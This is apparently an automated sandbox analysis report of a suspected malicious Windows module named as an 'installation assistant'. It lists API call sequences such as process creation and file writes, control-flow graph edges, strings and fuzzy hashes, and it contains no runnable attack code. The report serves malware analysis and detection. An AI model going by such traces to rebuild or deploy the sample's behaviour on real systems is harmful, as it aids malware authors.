                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4180
                                        • __dosmaperr.LIBCMT ref: 6C0E4187
                                        • GetFileType.KERNEL32(00000000), ref: 6C0E4193
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E419D
                                        • __dosmaperr.LIBCMT ref: 6C0E41A6
                                        • CloseHandle.KERNEL32(00000000), ref: 6C0E41C6
                                        • CloseHandle.KERNEL32(6C0DB0D0), ref: 6C0E4313
                                        • GetLastError.KERNEL32 ref: 6C0E4345
                                        • __dosmaperr.LIBCMT ref: 6C0E434C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: 8Q
                                        • API String ID: 4237864984-4022487301
                                        • Opcode ID: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                        • Instruction ID: 8afdc2ddee86b38afdf8e44a6b0db1599d3271820675e7391979958d4474ca53
                                        • Opcode Fuzzy Hash: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                        • Instruction Fuzzy Hash: 34A13732A44144AFCF098FE8C8517AE7BF1EB4A328F18425DE811EB781CB359906DB52

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7002 6c09c1e0-6c09c239 call 6c0c6b70 7005 6c09c260-6c09c269 7002->7005 7006 6c09c26b-6c09c270 7005->7006 7007 6c09c2b0-6c09c2b5 7005->7007 7010 6c09c2f0-6c09c2f5 7006->7010 7011 6c09c272-6c09c277 7006->7011 7008 6c09c330-6c09c335 7007->7008 7009 6c09c2b7-6c09c2bc 7007->7009 7016 6c09c489-6c09c4b9 call 6c0cb3a0 7008->7016 7017 6c09c33b-6c09c340 7008->7017 7012 6c09c2c2-6c09c2c7 7009->7012 7013 6c09c407-6c09c41b 7009->7013 7014 6c09c2fb-6c09c300 7010->7014 7015 6c09c431-6c09c448 WriteFile 7010->7015 7018 6c09c27d-6c09c282 7011->7018 7019 6c09c372-6c09c3df WriteFile 7011->7019 7021 6c09c23b-6c09c250 7012->7021 7022 6c09c2cd-6c09c2d2 7012->7022 7020 6c09c41f-6c09c42c 7013->7020 7023 6c09c452-6c09c47f call 6c0cb920 ReadFile 7014->7023 7024 6c09c306-6c09c30b 7014->7024 7015->7023 7016->7005 7026 6c09c4be-6c09c4c3 7017->7026 7027 6c09c346-6c09c36d 7017->7027 7028 6c09c3e9-6c09c3fd WriteFile 7018->7028 7029 6c09c288-6c09c28d 7018->7029 7019->7028 7020->7005 7033 6c09c253-6c09c258 7021->7033 7022->7005 7030 6c09c2d4-6c09c2e7 7022->7030 7023->7016 7024->7005 7032 6c09c311-6c09c32b 7024->7032 7026->7005 7035 6c09c4c9-6c09c4d7 7026->7035 7027->7033 7028->7013 7029->7005 7036 6c09c28f-6c09c2aa 7029->7036 7030->7033 7032->7020 7033->7005 7036->7033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :uW$;uW$;uW$> 4!$> 4!
                                        • API String ID: 0-4100612575
                                        • Opcode ID: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                        • Instruction ID: 0f0072b5db2f6e650b3c52e0f36c91d2ab546b208418a8b5cae8184dd50a2cea
                                        • Opcode Fuzzy Hash: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                        • Instruction Fuzzy Hash: B9718BB0608345AFD710DF54C880B6ABBF4FF8A708F50592EF598D6650D375D888AB93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K?Jo$K?Jo$`Rlx$7eO
                                        • API String ID: 0-174837320
                                        • Opcode ID: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                        • Instruction ID: 184e1737b15399ce202cecced1161912909be6ba25ad0c9d90241cfaff4b316e
                                        • Opcode Fuzzy Hash: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                        • Instruction Fuzzy Hash: B34257B46093428FC764CF18C090B2EBBE1AFC9324F24AE1EE5A587B60D634D945DB53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;T55
                                        • API String ID: 0-2572755013
                                        • Opcode ID: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                        • Instruction ID: 13b00e5229b5c323a3f6e191573bb66299600866ea993f79ee8d5cd41a8ea94f
                                        • Opcode Fuzzy Hash: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                        • Instruction Fuzzy Hash: D703E633644B018FC728CF28C8D0695B7E3EFD53247198AADC4E64B6A5DB78B54ACB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7579 6c0c4ff0-6c0c5077 CreateProcessA 7580 6c0c50ca-6c0c50d3 7579->7580 7581 6c0c50d5-6c0c50da 7580->7581 7582 6c0c50f0-6c0c510b 7580->7582 7583 6c0c50dc-6c0c50e1 7581->7583 7584 6c0c5080-6c0c50c2 WaitForSingleObject CloseHandle * 2 7581->7584 7582->7580 7583->7580 7585 6c0c50e3-6c0c5118 7583->7585 7584->7580
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID: D
                                        • API String ID: 963392458-2746444292
                                        • Opcode ID: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                        • Instruction ID: f3485eeb0170fdabbf81bf86da3f3bb234bab1787c6a3de5d1c2a6a1a58bc4ab
                                        • Opcode Fuzzy Hash: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                        • Instruction Fuzzy Hash: 6F3102749093808FD340DF28C19872EBBF0EB8A358F505A1DF8D986250E7789588CF43

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7587 6c0dbc5e-6c0dbc7a 7588 6c0dbe39 7587->7588 7589 6c0dbc80-6c0dbc82 7587->7589 7590 6c0dbe3b-6c0dbe3f 7588->7590 7591 6c0dbca4-6c0dbcc5 7589->7591 7592 6c0dbc84-6c0dbc97 call 6c0cf9df call 6c0cf9cc call 6c0d0120 7589->7592 7593 6c0dbccc-6c0dbcd2 7591->7593 7594 6c0dbcc7-6c0dbcca 7591->7594 7607 6c0dbc9c-6c0dbc9f 7592->7607 7593->7592 7596 6c0dbcd4-6c0dbcd9 7593->7596 7594->7593 7594->7596 7598 6c0dbcdb-6c0dbce7 call 6c0dac69 7596->7598 7599 6c0dbcea-6c0dbcfb call 6c0dbe40 7596->7599 7598->7599 7608 6c0dbcfd-6c0dbcff 7599->7608 7609 6c0dbd3c-6c0dbd4e 7599->7609 7607->7590 7612 6c0dbd26-6c0dbd32 call 6c0dbeb1 7608->7612 7613 6c0dbd01-6c0dbd09 7608->7613 7610 6c0dbd95-6c0dbdb7 WriteFile 7609->7610 7611 6c0dbd50-6c0dbd59 7609->7611 7614 6c0dbdb9-6c0dbdbf GetLastError 7610->7614 7615 6c0dbdc2 7610->7615 7617 6c0dbd5b-6c0dbd5e 7611->7617 7618 6c0dbd85-6c0dbd93 call 6c0dc2c3 7611->7618 7622 6c0dbd37-6c0dbd3a 7612->7622 7619 6c0dbd0f-6c0dbd1c call 6c0dc25b 7613->7619 7620 6c0dbdcb-6c0dbdce 7613->7620 7614->7615 7623 6c0dbdc5-6c0dbdca 7615->7623 7625 6c0dbd75-6c0dbd83 call 6c0dc487 7617->7625 7626 6c0dbd60-6c0dbd63 7617->7626 7618->7622 7630 6c0dbd1f-6c0dbd21 7619->7630 7624 6c0dbdd1-6c0dbdd6 7620->7624 7622->7630 7623->7620 7631 6c0dbdd8-6c0dbddd 7624->7631 7632 6c0dbe34-6c0dbe37 7624->7632 7625->7622 7626->7624 7633 6c0dbd65-6c0dbd73 call 6c0dc39e 7626->7633 7630->7623 7635 6c0dbddf-6c0dbde4 7631->7635 7636 6c0dbe09-6c0dbe15 7631->7636 7632->7590 7633->7622 7641 6c0dbdfd-6c0dbe04 call 6c0cf9f2 7635->7641 7642 6c0dbde6-6c0dbdf8 call 6c0cf9cc call 6c0cf9df 7635->7642 7639 6c0dbe1c-6c0dbe2f call 6c0cf9cc call 6c0cf9df 7636->7639 7640 6c0dbe17-6c0dbe1a 7636->7640 7639->7607 7640->7588 7640->7639 7641->7607 7642->7607
                                        APIs
                                          • Part of subcall function 6C0DBEB1: GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                        • WriteFile.KERNEL32(?,?,6C0E46EC,00000000,00000000,?,00000000,00000000,6C0E5AB6,00000000,00000000,?,00000000,6C0DB0D0,6C0E46EC,00000000), ref: 6C0DBDAF
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0DBDB9
                                        • __dosmaperr.LIBCMT ref: 6C0DBDFE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 251514795-4022487301
                                        • Opcode ID: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                        • Instruction ID: 6e45ec93a3c751a8b5fc8aa818508e07b0289fd478fad7561c28b72f8184161c
                                        • Opcode Fuzzy Hash: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                        • Instruction Fuzzy Hash: 4F51C571A0030AAFDF019FA8C840BEEBBF9EF05358F560551E510A7A51DB70B945CBA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7654 6c0c5b90-6c0c5b9c 7655 6c0c5bdd 7654->7655 7656 6c0c5b9e-6c0c5ba9 7654->7656 7657 6c0c5bdf-6c0c5c57 7655->7657 7658 6c0c5bbf-6c0c5bcc call 6bf901f0 call 6c0d0b18 7656->7658 7659 6c0c5bab-6c0c5bbd 7656->7659 7660 6c0c5c59-6c0c5c81 7657->7660 7661 6c0c5c83-6c0c5c89 7657->7661 7667 6c0c5bd1-6c0c5bdb 7658->7667 7659->7658 7660->7661 7663 6c0c5c8a-6c0c5d49 call 6bf92250 call 6bf92340 call 6c0c9379 call 6bf8e010 call 6c0c7088 7660->7663 7667->7657
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 323602529-1866435925
                                        • Opcode ID: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                        • Instruction ID: 983d45d8af53bba410f8ff734203849c4d6d8c996710b88a30bb91d1233496ac
                                        • Opcode Fuzzy Hash: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                        • Instruction Fuzzy Hash: 565124B5600B008FD725CF29C495BA6BBF1FB48318F508A2DD89647B90D775B909CF91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7699 6c0db925-6c0db939 call 6c0e15a2 7702 6c0db93f-6c0db947 7699->7702 7703 6c0db93b-6c0db93d 7699->7703 7705 6c0db949-6c0db950 7702->7705 7706 6c0db952-6c0db955 7702->7706 7704 6c0db98d-6c0db9ad call 6c0e171f 7703->7704 7714 6c0db9af-6c0db9b9 call 6c0cf9f2 7704->7714 7715 6c0db9bb 7704->7715 7705->7706 7708 6c0db95d-6c0db971 call 6c0e15a2 * 2 7705->7708 7709 6c0db957-6c0db95b 7706->7709 7710 6c0db973-6c0db983 call 6c0e15a2 CloseHandle 7706->7710 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7721 6c0db985-6c0db98b GetLastError 7710->7721 7719 6c0db9bd-6c0db9c0 7714->7719 7715->7719 7721->7704
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0E425F), ref: 6C0DB97B
                                        • GetLastError.KERNEL32(?,00000000,?,6C0E425F), ref: 6C0DB985
                                        • __dosmaperr.LIBCMT ref: 6C0DB9B0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                        • Instruction ID: bc4c40d611272a1f64b0d0a304d7ea03436eaaa6075fb142002965c1c6ba4a66
                                        • Opcode Fuzzy Hash: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                        • Instruction Fuzzy Hash: F6014833A452A05AC201077AA845B9DA7E94F87B3CF2A4709E82587AC2CF60F885C290

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7944 6c0d0b9c-6c0d0ba7 7945 6c0d0bbe-6c0d0bcb 7944->7945 7946 6c0d0ba9-6c0d0bbc call 6c0cf9cc call 6c0d0120 7944->7946 7948 6c0d0bcd-6c0d0be2 call 6c0d0cb9 call 6c0d873e call 6c0d9c60 call 6c0db898 7945->7948 7949 6c0d0c06-6c0d0c0f call 6c0dae75 7945->7949 7957 6c0d0c10-6c0d0c12 7946->7957 7963 6c0d0be7-6c0d0bec 7948->7963 7949->7957 7964 6c0d0bee-6c0d0bf1 7963->7964 7965 6c0d0bf3-6c0d0bf7 7963->7965 7964->7949 7965->7949 7966 6c0d0bf9-6c0d0c05 call 6c0d47bb 7965->7966 7966->7949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction ID: 6da696bc5f27015316ce5573d13d56b6a4f9cc28bc80b1d3ffd870fe0d96020a
                                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction Fuzzy Hash: F0F0F4325097546AC6211B39AC00BDB36D89F4237CF231715E87893ED0DB70F40ACAE2
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AB4
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AF4
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID:
                                        • API String ID: 323602529-0
                                        • Opcode ID: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                        • Instruction ID: d9b69faea24a0d0aa227bdb4362e91bb81dd11d9ba1effada35ab4dd24cb77dd
                                        • Opcode Fuzzy Hash: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                        • Instruction Fuzzy Hash: FC514975201B01DFD725CF25C485BE6BBF4FB08718F448A1CE8AA4B6A1DB34B549CB81
                                        APIs
                                        • GetLastError.KERNEL32(6C0F6DD8,0000000C), ref: 6C0CEF52
                                        • ExitThread.KERNEL32 ref: 6C0CEF59
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                        • Instruction ID: 7ff4d836846209e06997e57566a70cd09646bb0a13e0e9b1abeaac93bbe6340f
                                        • Opcode Fuzzy Hash: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                        • Instruction Fuzzy Hash: FAF0AFB1A00204AFDF009FB0D40ABAE3BF4FF41218F154649E42597B40CF34B946DBA2
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                        • Instruction ID: daff465e35a268d62ad76ec9c3736a205e75f430edbca84598b2198dcc10689f
                                        • Opcode Fuzzy Hash: e4fcf6bbbca3634c751cf0e20047692dcd11b5da4ea6888e5884837c1d1b2adf
                                        • Instruction Fuzzy Hash: FD118871A0420EAFCF05CF58E945A9B3BF8EF48308F054069F808AB301D631EA11CBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2339580486.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                        • Associated: 00000007.00000002.2339554056.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340911095.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2340992841.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341738523.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2341781010.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000007.00000002.2342607020.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction ID: 8fabd6d652315a8107c37655f75dd68ec912be72ba93f26020e9240a20051c05
                                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction Fuzzy Hash: F0012872C01159BFCF029FE88D00AEE7FF5AB08214F154165BD24A26A0E7319A24DB91
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                        Memory Dump Source
